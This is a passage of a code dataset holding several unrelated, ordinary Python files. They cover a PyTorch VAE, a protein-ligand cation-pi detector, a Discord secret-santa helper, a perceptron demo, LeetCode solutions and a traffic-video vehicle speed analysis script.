',\\n\\t\"abcdefg\"')\n)\n\nprint('}')\n","sub_path":"ioer_test/gentypes.py","file_name":"gentypes.py","file_ext":"py","file_size_in_byte":5415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"456751186","text":"import torch.nn as nn\nimport torch\n\n\nclass View(nn.Module):\n def __init__(self, shape):\n super().__init__()\n self.shape = shape\n\n def forward(self, x):\n return x.view(*self.shape)\n\n\nclass PrintShape(nn.Module):\n def forward(self, x):\n print(x.shape)\n return x\n\n\nclass RiVAE(nn.Module):\n def __init__(self, latent_dim, batch_size, img_shape):\n super(RiVAE, self).__init__()\n\n '''\n Output = ((I - K + 2P) / S + 1)\n I - a size of input neuron\n K - kernel size\n P - padding\n S - stride\n '''\n\n # encoder\n self.encoder = nn.Sequential(\n nn.Conv2d(3, 24, kernel_size=3, stride=3, padding=1),\n nn.LeakyReLU(0.2, inplace=True),\n nn.MaxPool2d(2, stride=2),\n nn.Conv2d(24, 12, kernel_size=3, stride=2, padding=1),\n nn.LeakyReLU(0.2, inplace=True),\n nn.MaxPool2d(2, stride=1),\n nn.Flatten(),\n nn.Linear(in_features=6348, out_features=latent_dim << 1),\n nn.Sigmoid(),\n View((-1, 2, latent_dim))\n )\n\n # decoder\n self.decoder = nn.Sequential(\n nn.Linear(in_features=latent_dim, out_features=6348),\n nn.ReLU(inplace=True),\n View((batch_size, 12, 23, 23)),\n nn.ConvTranspose2d(12, 24, kernel_size=3, stride=2),\n nn.ReLU(inplace=True),\n nn.ConvTranspose2d(24, 12, kernel_size=5, stride=3, padding=1),\n nn.ReLU(inplace=True),\n nn.ConvTranspose2d(12, 3, kernel_size=2, stride=2, padding=1),\n nn.Sigmoid()\n )\n\n def reparameterize(self, mu, log_var):\n \"\"\"\n :param mu: mean from the encoder's latent space\n :param log_var: log variance from the encoder's latent space\n \"\"\"\n std = torch.exp(0.5 * log_var) # standard deviation\n eps = torch.randn_like(std) # randn_like as we need the same size\n sample = mu + (eps * std) # sampling as if coming from the input space\n return sample\n\n def forward(self, x):\n # encoding\n x = self.encoder(x)\n\n # get `mu` and `log_var`\n mu = x[:, 0, :]\n log_var = x[:, 1, :]\n\n # get the latent vector through re-parameterization\n z = self.reparameterize(mu, log_var)\n\n # decoding\n reconstruction = self.decoder(z)\n return reconstruction, mu, log_var\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"304912305","text":"# This file is part of BINANA, released under the Apache 2.0 License. See\n# LICENSE.md or go to https://opensource.org/licenses/Apache-2.0 for full\n# details. Copyright 2020 Jacob D. Durrant.\n\nfrom binana._utils.shim import _set_default\nfrom binana.interactions.default_params import CATION_PI_DIST_CUTOFF, PI_PADDING_DIST\nimport binana\nfrom binana._utils.utils import hashtable_entry_add_one\nfrom binana._structure.mol import Mol\nfrom binana._utils._math_functions import project_point_onto_plane\n\n\ndef _detect_pi_cat(\n mol_with_aromatic,\n mol_with_pos_charge,\n cutoff,\n pi_padding,\n cat_pi,\n pdb_pi_cat,\n cat_pi_labels,\n name_of_charged=None,\n):\n name_of_charged = _set_default(name_of_charged, \"RECEPTOR\")\n\n for aromatic in mol_with_aromatic.aromatic_rings:\n for charged in mol_with_pos_charge.charges:\n # so only consider positive charges, because no pi-anion interaction\n if (\n charged.positive == True\n and charged.coordinates.dist_to(aromatic.center) < cutoff\n ):\n # distance cutoff based on \"Cation-pi interactions in\n # structural biology.\" project the charged onto the\n # plane of the aromatic\n charge_projected = project_point_onto_plane(\n charged.coordinates, aromatic.plane_coeff\n )\n\n if (\n charge_projected.dist_to(aromatic.center)\n < aromatic.radius + pi_padding\n ):\n structure = mol_with_aromatic.all_atoms[\n aromatic.indices[0]\n ].structure\n if structure == \"\":\n # since it could be interacting with a\n # cofactor or something\n structure = \"OTHER\"\n\n key = \"PI-CATION_\" + name_of_charged + \"-CHARGED_\" + structure\n\n for index in aromatic.indices:\n pdb_pi_cat.add_new_atom(\n mol_with_aromatic.all_atoms[index].copy_of()\n )\n for index in charged.indices:\n pdb_pi_cat.add_new_atom(\n mol_with_pos_charge.all_atoms[index].copy_of()\n )\n\n hashtable_entry_add_one(cat_pi, key)\n\n charged_mol_lbls = (\n \"[\"\n + \" / \".join(\n [\n mol_with_pos_charge.all_atoms[index].string_id()\n for index in charged.indices\n ]\n )\n + \"]\"\n )\n\n aromatic_mol_lbls = (\n \"[\"\n + \" / \".join(\n [\n mol_with_aromatic.all_atoms[index].string_id()\n for index in aromatic.indices\n ]\n )\n + \"]\"\n )\n\n if name_of_charged == \"LIGAND\":\n cat_pi_labels.append(\n (\n charged_mol_lbls,\n aromatic_mol_lbls,\n )\n )\n else:\n cat_pi_labels.append(\n (\n aromatic_mol_lbls,\n charged_mol_lbls,\n )\n )\n\n return cat_pi, pdb_pi_cat, cat_pi_labels\n\n\n# Be sure to update the corresponding function in\n# binana.interactions.__init__.py as well!\n\n\ndef get_cation_pi(ligand, receptor, cutoff=None, pi_padding=None):\n \"\"\"Identifies and counts the number of pi-cation interactions between the\n protein and ligand. Output is formatted like this::\n\n {\n 'counts': {\n 'PI-CATION_LIGAND-CHARGED_BETA': 2,\n 'PI-CATION_LIGAND-CHARGED_OTHER': 2,\n 'PI-CATION_RECEPTOR-CHARGED_OTHER': 1\n },\n 'labels': [\n ('[A:CHT(1):N1(2) / A:CHT(1):C5(1) / A:CHT(1):C6(3) / A:CHT(1):C6(4) / A:CHT(1):C7(9)]', '[A:TRP(43):CG(28) / A:TRP(43):CD1(29) / A:TRP(43):NE1(31) / A:TRP(43):CE2(32) / A:TRP(43):CD2(30)]'),\n ('[A:CHT(1):N1(2) / A:CHT(1):C5(1) / A:CHT(1):C6(3) / A:CHT(1):C6(4) / A:CHT(1):C7(9)]', '[A:TRP(43):CE2(32) / A:TRP(43):CD2(30) / A:TRP(43):CE3(33) / A:TRP(43):CZ3(35) / A:TRP(43):CH2(36) / A:TRP(43):CZ2(34)]')\n ],\n 'mol': \n }\n\n Args:\n ligand (binana._structure.mol.Mol): The ligand molecule to analyze.\n receptor (binana._structure.mol.Mol): The receptor molecule to analyze.\n cutoff (float, optional): The distance cutoff. Defaults to\n CATION_PI_DIST_CUTOFF.\n pi_padding (float, optional): The amount by which the radius of each pi\n ring should be artificially expanded, to be sure to catch the\n interactions. Defaults to PI_PADDING_DIST.\n\n Returns:\n dict: Contains the atom tallies (\"counts\"), the\n binana._structure.mol.Mol object with the participating atoms (\"mol\"),\n and the labels to use in the log file (\"labels\").\n \"\"\"\n\n cutoff = _set_default(cutoff, CATION_PI_DIST_CUTOFF)\n pi_padding = _set_default(pi_padding, PI_PADDING_DIST)\n\n cat_pi = {}\n pdb_pi_cat = Mol()\n cat_pi_labels = []\n\n cat_pi, pdb_pi_cat, cat_pi_labels = _detect_pi_cat(\n receptor,\n ligand,\n cutoff,\n pi_padding,\n cat_pi,\n pdb_pi_cat,\n cat_pi_labels,\n \"LIGAND\",\n )\n cat_pi, pdb_pi_cat, cat_pi_labels = _detect_pi_cat(\n ligand,\n receptor,\n cutoff,\n pi_padding,\n cat_pi,\n pdb_pi_cat,\n cat_pi_labels,\n \"RECEPTOR\",\n )\n\n return {\n \"counts\": cat_pi,\n \"mol\": pdb_pi_cat,\n \"labels\": cat_pi_labels,\n }\n","sub_path":"vscreenml_v2/binana/interactions/_cat_pi.py","file_name":"_cat_pi.py","file_ext":"py","file_size_in_byte":6251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"510778356","text":"import alfred3 as al\n\nimport alfred3_interact as ali\n\nexp = al.Experiment()\n\nexp.admin += ali.MatchMakerMonitoring(\"plugins.mm\", name=\"monitor\")\nexp.admin += ali.MatchMakerActivation(\"plugins.mm\", name=\"activate\")\n\n\n@exp.setup\ndef setup(exp):\n spec = ali.IndividualSpec(5, name=\"test\")\n exp.plugins.mm = ali.MatchMaker(spec, exp=exp)\n\n\nexp += al.Page(title=\"Page 1\", name=\"p1\")\n","sub_path":"tests/res/script-admin.py","file_name":"script-admin.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"370689563","text":"# Positional function argument with multiple parameters\r\n# Additionally order of parameters matters\r\n\r\ndef candy(name_1,name_2):\r\n\tprint(\"\\nSo you like \" + name_1.title())\r\n\tprint(\"Additionally you like \" + name_2.title())\r\n\t\r\ncandy('peanut m&m\\'s','trolli')\r\ncandy('reese\\'s','chocolate')\r\n\r\n# Cam tell python which ones which as well \r\n\r\ncandy(name_2 = 'peanut m&m\\'s', name_1 = 'trolli')\r\n\r\n# Can set a default value \r\n\r\ndef gatorade(color, color_2 = 'blue'):\r\n\tprint(\"\\nSo you like \" + color.title() + \" gatorade\")\r\n\tprint(\"Additionally you like \" + color_2.title() + \" gatorade\")\r\n\r\ngatorade('yellow')\r\ngatorade('red','yellow')\r\n","sub_path":"chapter_8/candy.py","file_name":"candy.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"351222985","text":"import copy\nimport random\nfrom discord import Member\nfrom discord.abc import GuildChannel, PrivateChannel\nimport discord\nfrom helpers.SecretSantaParticipant import SecretSantaParticipant\n\nclass SecretSantaHelpers():\n\n def isListOfParticipants(self, usrlist: list):\n for usr in usrlist:\n if(not isinstance(usr, SecretSantaParticipant)):\n return False\n\n def user_is_participant(self, usrid: discord.User.id, usrlist: list):\n \"\"\"Takes a discord user ID string and returns whether\n a user with that ID is in usr_list\"\"\"\n for person in usrlist:\n if int(person.idstr) == usrid:\n return True\n return False\n\n def get_participant_object(self, usrid: int, usrlist: list, id_is_partner=False):\n \"\"\"takes a discord user ID string and list of\n participant objects, and returns the first\n participant object with matching id.\n\n Parameters:\n usrid (int): the ID of the user you're looking for\n usrlist (list): the list the user resides in\n id_is_partner (bool): if True, this function will find the SecretSantaParticipant in usrlist with the usrid as its partner\n \"\"\"\n for (index, person) in enumerate(usrlist):\n if(id_is_partner):\n if(person.partnerid != \"\"):\n if(int(person.partnerid) == usrid):\n return (index, person)\n else:\n if(int(person.idstr) == usrid):\n return (index, person)\n return (-1, None)\n\n def propose_partner_list(self, usrlist: list):\n \"\"\"Generate a proposed partner list\"\"\"\n usr_list_copy = copy.deepcopy(usrlist)\n partners = copy.deepcopy(usrlist)\n ## propose partner list\n for user in usr_list_copy:\n candidates = partners\n partner = candidates[random.randint(0, len(candidates) - 1)]\n while(partner.idstr == user.idstr):\n partner = candidates[random.randint(0, len(candidates) - 1)]\n if((len(candidates) == 1) & (candidates[0].idstr == user.idstr)):\n break # no choice but to pick yourself (this will be declared invalid later)\n #remove user's partner from list of possible partners\n partners.remove(partner)\n #save the partner id to the participant's class instance\n user.partnerid = partner.idstr\n return usr_list_copy\n\n ## everybody has a partner, nobody's partnered with themselves\n def partners_are_valid(self, usrlist: list):\n \"\"\"Make sure that everybody has a partner\n and nobody is partnered with themselves\"\"\"\n if(not usrlist):\n return False\n result = True\n for user in usrlist:\n result = result & (user.partnerid != '') & (user.partnerid != user.idstr)\n return result\n\n ## checks if the user list changed during a pause\n def usr_list_changed_during_pause(self, usrlist: list, usr_left: bool):\n \"\"\"checks if the user list changed during a pause\"\"\"\n if(usr_left):# there's probably a better boolean logic way but this is easy\n usr_left = False # acknowledge\n return True\n\n has_changed = True\n for user in usrlist:\n has_match = (not (str(user.partnerid) == \"\"))\n has_changed = has_changed & has_match # figures out if all users have a match\n has_changed = has_changed & (not usr_left)\n return (not has_changed) ## if not all users have a match\n\n def channelIsPrivate(self, channel):\n return isinstance(channel, PrivateChannel)\n\n def channel_is_guild(self, channel):\n return isinstance(channel, GuildChannel)\n\n def member_is_mod(self, person: discord.Member, mod_list: list):\n \"\"\"Checks that a given member is in the mod list\n @param person the Member in question\"\"\"\n if(isinstance(person, Member)):\n person_roles = person.roles\n person_roles_ids = []\n for person_role in person_roles:\n person_roles_ids.append(person_role.id)\n lst3 = [value for value in person_roles_ids if value in mod_list]\n if(lst3):\n return True\n return False\n\n def is_role_in_server(self, p_role: str, server_role_hierarchy: list):\n if(isinstance(p_role, str)):\n for server_role in server_role_hierarchy:\n if((str(server_role) == p_role) or (str(server_role.mention) == p_role)):\n return server_role\n return False\n","sub_path":"helpers/SecretSantaHelpers.py","file_name":"SecretSantaHelpers.py","file_ext":"py","file_size_in_byte":4639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"98822352","text":"from utils import bet_unet\nfrom model import unet\nfrom tqdm import tqdm\nimport nibabel as nib\n\nimport os\nimport time\nimport argparse\n\n\ndef detect_file(filename, model, unet):\n data = nib.load(filename)\n mask = nib.load(filename)\n mask_roi = nib.load(filename)\n\n width, height, frame_num = data.shape\n matrix = data.get_data()\n unet_matrix = bet_unet(matrix, unet, threshold=0.2)\n\n start = time.time()\n for i in tqdm(range(frame_num), desc='Detect in {}'.format(os.path.basename(filename))):\n bet = unet_matrix[:, :, i]\n mask.get_data()[:, :, i] = bet\n mask_roi.get_data()[:, :, i] = bet\n end = time.time()\n\n print('Using time {}s'.format(end - start))\n return mask, mask_roi\n\n\nif __name__ == '__main__':\n import config\n data_root = config.data_root\n model_path = config.model_path\n result_path = config.result_path\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', '--input', help='input path')\n parser.add_argument('-o', '--output', help='output path')\n args = parser.parse_args()\n\n data_filename = args.input\n data_path = os.path.join(data_root, data_filename)\n\n result_filename = args.output if args.output else '{}_detect_by_unet.nii'.format(\n data_filename.split('/')[-1].split('.')[-2])\n\n result_path = os.path.join(result_path, result_filename)\n\n unet_path = os.path.join(model_path, 'unet_pm25_yuzq.hdf5')\n bet_net = unet(pretrained_weights=unet_path)\n\n mask, mask_roi = detect_file(data_path, None, bet_net)\n\n nib.save(mask, result_path)\n nib.save(mask_roi, './mask/roi_by_unet.nii')\n","sub_path":"detect_by_unet.py","file_name":"detect_by_unet.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"355988341","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('news', '0017_auto_20160508_1821'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='music',\n name='name',\n field=models.CharField(default=1, max_length=256, verbose_name='\\u6b4c\\u66f2\\u540d\\u79f0'),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='pic',\n name='name',\n field=models.CharField(default=1, max_length=256, verbose_name='\\u56fe\\u7247\\u540d\\u79f0'),\n preserve_default=False,\n ),\n ]\n","sub_path":"news/migrations/0018_auto_20160508_1831.py","file_name":"0018_auto_20160508_1831.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"75035989","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n# 定义输入数据\nX = np.array([ # 四行三列\n [1, 3, 3],\n [1, 4, 3],\n [1, 1, 1],\n [1, 2, 1]\n])\n\n# 定义标签\nT = np.array([\n [1], # 四行一列\n [1],\n [-1],\n [-1]\n])\n\n# 权值初始化\nW = np.random.random([3, 1]) # 生成3行一列的(左右侧是多少个)\n\n# 设置学习率\nlr = 0.1\n\n# 神经网络输出\nY = 0\n\n\ndef train():\n \"\"\"更新权值\"\"\"\n global X, Y, W, T, lr # 作为全局变量\n Y = np.sign(np.dot(X, W)) # 同时计算四个数据的预测值\n E = T - Y # 得到的四个标签与预测值的误差值E(4,1)\n delta_W = lr * (X.T.dot(E) / X.shape[0]) # 计算权值的变化\n W = W + delta_W # 更新权值\n\n\n# 训练模型\nfor i in range(100):\n train() # 更新权值\n print(\"epoch:\", i + 1) # 当前训练次数\n print(\"weights:\", W) # 当前的权值\n Y = np.sign(np.dot(X, W)) # 计算当前输出\n if (Y == T).all(): # all() 表示Y中所有值跟T中的所有值都对应相等,才为真\n print(\"Finished\")\n break # 跳出循环\n\n# 最后结果画图\n# 正样本xy坐标\nx1 = [3, 4]\ny1 = [3, 3]\n\n# 负样本xy坐标\nx2 = [1, 2]\ny2 = [1, 1]\n\n# 分类边界线\n# w0 + w1*x1 + w2*x2 =>> 分类边界线 0\n# 定义分类边界线的斜率换个截距\nk = -W[1] / W[2]\nd = -W[0] / W[2]\n# 设定两个点\nxdata = (0, 5)\n# 通过来确定一条直线,用红色的线画出分界线\nplt.plot(xdata, xdata * k + d, 'r')\n# 用蓝色的线画正样本\nplt.scatter(x1, y1, c='b')\n# 用黄色的点画负样本\nplt.scatter(x2, y2, c='y')\nplt.show()\n","sub_path":"zheng_01_单层感知器.py","file_name":"zheng_01_单层感知器.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"247026592","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nGiven a 32-bit signed integer, reverse digits of an integer.\n\nExample 1:\n\nInput: 123\nOutput: 321\nExample 2:\n\nInput: -123\nOutput: -321\nExample 3:\n\nInput: 120\nOutput: 21\nNote:\nAssume we are dealing with an environment which could only store integers within the 32-bit signed integer range: [−231,  231 − 1]. For the purpose of this problem, assume that your function returns 0 when the reversed integer overflows.\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/reverse-integer\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\"\"\"\n\n\nclass Solution:\n def reverse(self, x: int) -> int:\n sign = False\n if x < 0:\n sign = True\n\n x = abs(x)\n\n x = str(x)\n\n chars = []\n for c in x:\n chars.append(c)\n\n chars.reverse()\n\n y = ''.join(chars)\n\n y.split('0')\n\n y = int(y)\n\n if sign:\n if y > 2 ** 31:\n y = 0\n else:\n y = -y\n else:\n if y > 2 ** 31 - 1:\n y = 0\n else:\n y = y\n return y\n\n def reverse_2(self, x):\n rev = 0\n\n if x > 0:\n flag = True\n elif x < 0:\n flag = False\n else:\n return rev\n\n while x != 0:\n x = abs(x)\n pop = x % 10\n x = x // 10\n\n if flag:\n if rev > 2**31 // 10 or (rev == 2**31 // 10 and pop > 7):\n return 0\n else:\n if rev > 2**31 // 10 or (rev == 2**31 // 10 and pop > 8):\n return 0\n rev = rev * 10 + pop\n\n if flag:\n return rev\n return -rev\n\n\nif __name__ == '__main__':\n s = Solution()\n ret = s.reverse_2(-765761230)\n print(ret)\n","sub_path":"leetcode/02_reverse_integer.py","file_name":"02_reverse_integer.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"536389311","text":"\"\"\"\nEach turn, we choose the two heaviest rocks and smash them together. \nSuppose the stones have weights x and y with x <= y. The result of this smash is:\n\nIf x == y, both stones are totally destroyed;\nIf x != y, the stone of weight x is totally destroyed, and the stone of weight y has new weight y-x.\nAt the end, there is at most 1 stone left. Return the weight of this stone (or 0 if there are no stones left.)\n\"\"\"\nimport bisect\nimport heapq\nclass Solution(object):\n # O(log(n) * n)\n def lastStoneWeight(self, stones):\n \"\"\"\n :type stones: List[int]\n :rtype: int\n \"\"\"\n stones = [-x for x in stones]\n heapq.heapify(stones)\n while stones and len(stones) > 1:\n max1 = -heapq.heappop(stones)\n max2 = -heapq.heappop(stones)\n if max1 != max2:\n heapq.heappush(stones, -abs(max1 - max2))\n return -stones[0] if stones else 0\n \"\"\"\n O(n^2) sorted insert is O(n)\n logn for search but O(n) for the actual insert in python list\n \"\"\"\n def lastStoneWeightSort(self, stones):\n \"\"\"\n :type stones: List[int]\n :rtype: int\n \"\"\"\n stones = sorted(stones)\n while stones and len(stones) > 1:\n max1 = stones.pop()\n max2 = stones.pop()\n bisect.insort(stones, abs(max1 - max2))\n return stones.pop() if stones else 0\n","sub_path":"simulation/merge_heaviest_stones.py","file_name":"merge_heaviest_stones.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"442994297","text":"from calibration import *\nfrom util import *\nfrom yolo_func import *\nfrom copy import deepcopy\nimport pandas as pd\nfrom scipy import io as sio\n\n\ndef getSpeed(d_path, c_path, calib_L, v_path=None):\n \"\"\"\n Get speed of the leftturn vehicle and straight driving vehicle\n :param d_path: detection file path\n :param c_path: config file path\n :param calib_L: calibration matrix\n :param v_path: video file path, only for debug visulization\n :return velocity_tv: velocity of the leftturn vehicle\n :return velocity_sdv: velocity of the straight driving vehicle\n \"\"\"\n ds, total_frame = readFile(d_path)\n c, _ = readFile(c_path)\n area = [c[\"lefeturn_area\"], c[\"straight_area\"]]\n conflict_area = polygonIntersction(area[0], area[1])\n sd_area = polygonNonIntersect(area[1], area[0])\n frame_cf = []\n frame_sd = []\n timestamp = []\n frame_num = []\n\n # debug\n debug_frame_cf = []\n debug_frame_sd = []\n\n for frame in range(total_frame):\n in_cf = [] # conflict area\n in_sd = [] # straight driving area\n debug_box_cf = [] # debug\n debug_box_sd = [] # debug\n try:\n for vehicle in ds[str(frame+1)][\"vehicle\"]: # frame start from 1\n bottom_center_uv = [vehicle[0], vehicle[1]+vehicle[3]/2]\n if pointInPolygon(bottom_center_uv, conflict_area): # conflict area\n bc_xyz = DLTrecon_z(bottom_center_uv, calib_L, 0) # reconstruct to 3D coord\n in_cf.append(bc_xyz) # in 3D, with z = 0\n # debug\n debug_box_cf.append(vehicle)\n\n elif pointInPolygon(bottom_center_uv, sd_area): # straight driving area\n bc_xyz = DLTrecon_z(bottom_center_uv, calib_L, 0) # reconstruct to 3D coord\n in_sd.append(bc_xyz) # in 3D, with z = 0\n # debug\n debug_box_sd.append(vehicle)\n\n if not len(in_cf) == 0 and not len(in_sd) == 0:\n # debug\n # if len(in_cf) > 1: # should be only one car in the conflict area\n # print(\"[CHECK] Frame: \", frame, \" --> More than one vehivle in conflict zone\")\n # box_l = deepcopy(debug_box_cf)\n # box_l.extend(debug_box_sd)\n # debug_vis(v_path, [frame], [box_l])\n # debug\n # if len(in_sd) > 1:\n # print(\"[CHECK] Frame: \", frame, \" --> More than one vehivle in straight driving zone\")\n # _, key = closest_sdv(in_sd)\n # # put the most front straight driving vehicle first, so it should be in blue\n # box_l = deepcopy([debug_box_sd[key]])\n # box_l.extend([debug_box_sd[k] for k in range(len(debug_box_sd)) if not k==key])\n # box_l.extend(debug_box_cf)\n # debug_vis(v_path, [frame], [box_l])\n\n frame_num.append(frame)\n frame_cf.append(in_cf[0])\n frame_sd.append(closest_sdv(in_sd)[0]) # find the most front straight driving vehicle\n timestamp.append(ds[str(frame+1)][\"timestamp\"])\n\n # debug\n debug_frame_cf.append(debug_box_cf)\n debug_frame_sd.append(debug_box_sd)\n\n except KeyError:\n continue\n\n continue_frame, cf, sd, t = continue_list(frame_num, frame_cf, frame_sd, timestamp)\n _, debug_cf, debug_sd, _ = continue_list(frame_num, debug_frame_cf, debug_frame_sd, timestamp)\n\n velocity_cfv, velocity_sdv, distance_sdv = [], [], []\n for k in range(len(continue_frame)): # one video can have multipal useful pieces\n temp_f = continue_frame[k]\n if len(temp_f) < 50: # ignore short piecese length < 50\n continue\n\n # debug visualization\n # box_l = []\n # for ll in range(len(debug_cf[k])):\n # box_l.append([])\n # box_l[ll].extend(debug_cf[k][ll])\n # box_l[ll].extend(debug_sd[k][ll])\n # fff = os.path.splitext(os.path.basename(v_path))[0] # get file name\n # ddd = os.path.dirname(v_path) # get dir name\n # ppp = ddd + '/' + fff + 'detect' + str(k) + '.avi'\n # debug_vis(v_path, temp_f, box_l,\n # video_o=ppp) # show all the frames in that piece with saving the detections\n # debug_vis(v_path, temp_f, box_l) # show all the frames in that piece\n # debug_vis(v_path, [temp_f[0]], [box_l[0]]) # show the first frame in that piece\n\n temp_cf = cf[k]\n temp_sd = sd[k]\n temp_t = t[k]\n\n # calculate the average velocity\n temp_cfv = (np.array(temp_cf[-1]) - np.array(temp_cf[0]))/(temp_t[-1]-temp_t[0])*1e3 # t is in millisecond\n temp_sdv = (np.array(temp_sd[-1]) - np.array(temp_sd[0]))/(temp_t[-1]-temp_t[0])*1e3 # t is in millisecond\n\n if temp_cfv[0] > 0 and temp_cfv[1] < 0 and temp_sdv[1] > 0:\n velocity_cfv.append(np.linalg.norm(temp_cfv))\n velocity_sdv.append(temp_sdv[1])\n distance_sdv.append(temp_cf[-1][1]-temp_sd[-1][1])\n\n return velocity_cfv, velocity_sdv, distance_sdv\n\n\ndef closest_sdv(v_list):\n \"\"\"\n Find the most front straight driving vehicle in the v_list\n :param v_list: list of [array], should be candidate straight driving vehicles\n :return vehicle: the most front straight driving vehicle coord in np.array\n \"\"\"\n max_y = -1e10\n key = None\n for k, n in enumerate(v_list):\n if n[1] > max_y:\n max_y = n[1]\n key = k\n\n vehicle = v_list[key]\n return vehicle, key\n\n\ndef continue_list(frame, lt, sd, timestamp):\n # cut when time diff > 100 ms\n return np.split(frame, np.where(np.diff(timestamp) > 100)[0] + 1), \\\n np.split(lt, np.where(np.diff(timestamp) > 100)[0] + 1), \\\n np.split(sd, np.where(np.diff(timestamp) > 100)[0] + 1), \\\n np.split(timestamp, np.where(np.diff(timestamp) > 100)[0] + 1)\n\n\ndef debug_vis(video, frame_vis, boxes_frames, video_o=None):\n \"\"\"\n Show video from the frame\n :param video: video path\n :param frame_vis: list [int], the frames you are interested in\n :param boxes_frames: list of interested boxes with different frames, if none, put []\n :param video_o: output video path for detections\n :return:\n \"\"\"\n vs = cv2.VideoCapture(video)\n frame_count = 0\n color = [(255, 0, 0), (0, 0, 255), (0, 255, 0), (255, 255, 0), (0, 255, 255), (255, 255, 255), (0, 0, 0)]\n # cv2 color space is in BGR not RGB\n # 'blue', 'red', 'green', 'aqua', 'yellow', 'white', 'black'\n dots = [] # store history bottom center point with corresponding color\n writer = None\n while vs.isOpened():\n _, f = vs.read()\n frame_count += 1\n if int(frame_count) in frame_vis:\n kk = list(frame_vis).index(int(frame_count))\n if not boxes_frames == []:\n boxes = boxes_frames[kk]\n for ind, box in enumerate(boxes):\n centerX = box[0]\n centerY = box[1]\n w = box[2]\n h = box[3]\n x = int(centerX - (w / 2))\n y = int(centerY - (h / 2))\n # show bounding box\n cv2.rectangle(f, (x, y), (int(x + w), int(y + h)), color[ind], 2)\n # show the trajectory dots\n dots.append((int(centerX), int(centerY + h/2), color[ind]))\n for ll in dots:\n cv2.circle(f, ll[0:2], 5, ll[2], thickness=5)\n cv2.imshow(\"video\", f)\n if writer is None:\n # initialize our video writer\n fourcc = cv2.VideoWriter_fourcc(*\"MJPG\")\n if video_o is not None:\n writer = cv2.VideoWriter(video_o, fourcc, 30,\n (f.shape[1], f.shape[0]), True)\n else:\n writer = -1\n if video_o is not None:\n writer.write(f)\n\n \"\"\"Following is for continue playing\"\"\"\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n \"\"\"Following is for pause each frame\"\"\"\n # key = cv2.waitKey(0)\n # cv2.destroyAllWindows()\n # while key not in [ord('q'), ord('w')]:\n # key = cv2.waitKey(0)\n # if key == ord('q'):\n # break\n\n elif frame_count > frame_vis[-1]:\n break\n vs.release()\n cv2.destroyAllWindows()\n if video_o is not None:\n writer.release()\n\n\n\"\"\"Star left turn\"\"\"\nshow_calib = False\nshow_area = False\n\n# Calibration\n# For left-turn00.mkv ~ 03.mkv:\nconfig_path ='./config/leftturn00.json'\nconfig, _ = readFile(config_path)\n\nleftturn00_3D = config['calib_point']['point3D']\nleftturn00_2D = config['calib_point']['point2D']\n\nL, pixel_err = Simple_DLT(leftturn00_3D, leftturn00_2D)\npoint_num = len(leftturn00_3D)\ndistance_err = []\nfor i in range(point_num):\n z = leftturn00_3D[i][2]\n distance_err.append(np.linalg.norm(DLTrecon_z(leftturn00_2D[i], L, z) - leftturn00_3D[i][0:2]))\n\n# show ground points\nif show_calib:\n print(\"Mean pixel_err: \", np.mean(pixel_err))\n print(\"Mean distance_err: \", np.mean(distance_err))\n xz_0 = []\n yz_0 = []\n # print(DLTrecon_z([1132.5,591.0], L, 0)) # for get boundary point\n for i in range(10):\n xz_0.append([(11.6 + 6.4) / 10 * i - 6.4, 0, 0])\n yz_0.append([0, (27 + 55) / 10 * (i + 1) - 55, 0])\n image = './images/leftturn00/calib_leftturn.png'\n showAxis_z0(xz_0, yz_0, L, image)\n\n\"\"\"Detection\"\"\"\nfolder = './videos/'\nyolo_path = './yolo-coco'\nextensions = ('.mp4', '.avi', '.wmv')\npre_results = './leftturn_result.json'\n\nif os.path.exists(pre_results):\n with open(pre_results) as json_file:\n data = json.load(json_file)\n dict_v_t = data['v_t']\n dict_v_sd = data['v_sd']\n dict_d_sd = data['d_sd']\n v_t_all, v_sd_all, d_sd_all = [], [], []\n for i in range(len(dict_d_sd)):\n v_t_all.append(dict_v_t[str(i)])\n v_sd_all.append(dict_v_sd[str(i)])\n d_sd_all.append(dict_d_sd[str(i)])\n\nelse:\n v_t_all, v_sd_all, d_sd_all = [], [], []\n\n\nfor subdir, dirs, files in os.walk(folder):\n for file in files:\n ext = os.path.splitext(file)[-1].lower()\n if ext in extensions:\n video_in = os.path.join(subdir, file)\n file_name = os.path.splitext(os.path.basename(video_in))[0]\n detect_path = os.path.join(folder, file_name + \".txt\")\n print(\"[INFO] Start detection: \", file_name, ext)\n yolo_video(video_in, yolo_path)\n\n v_t, v_sd, d_sd = getSpeed(detect_path, config_path, L, video_in)\n v_t_all.extend(v_t)\n 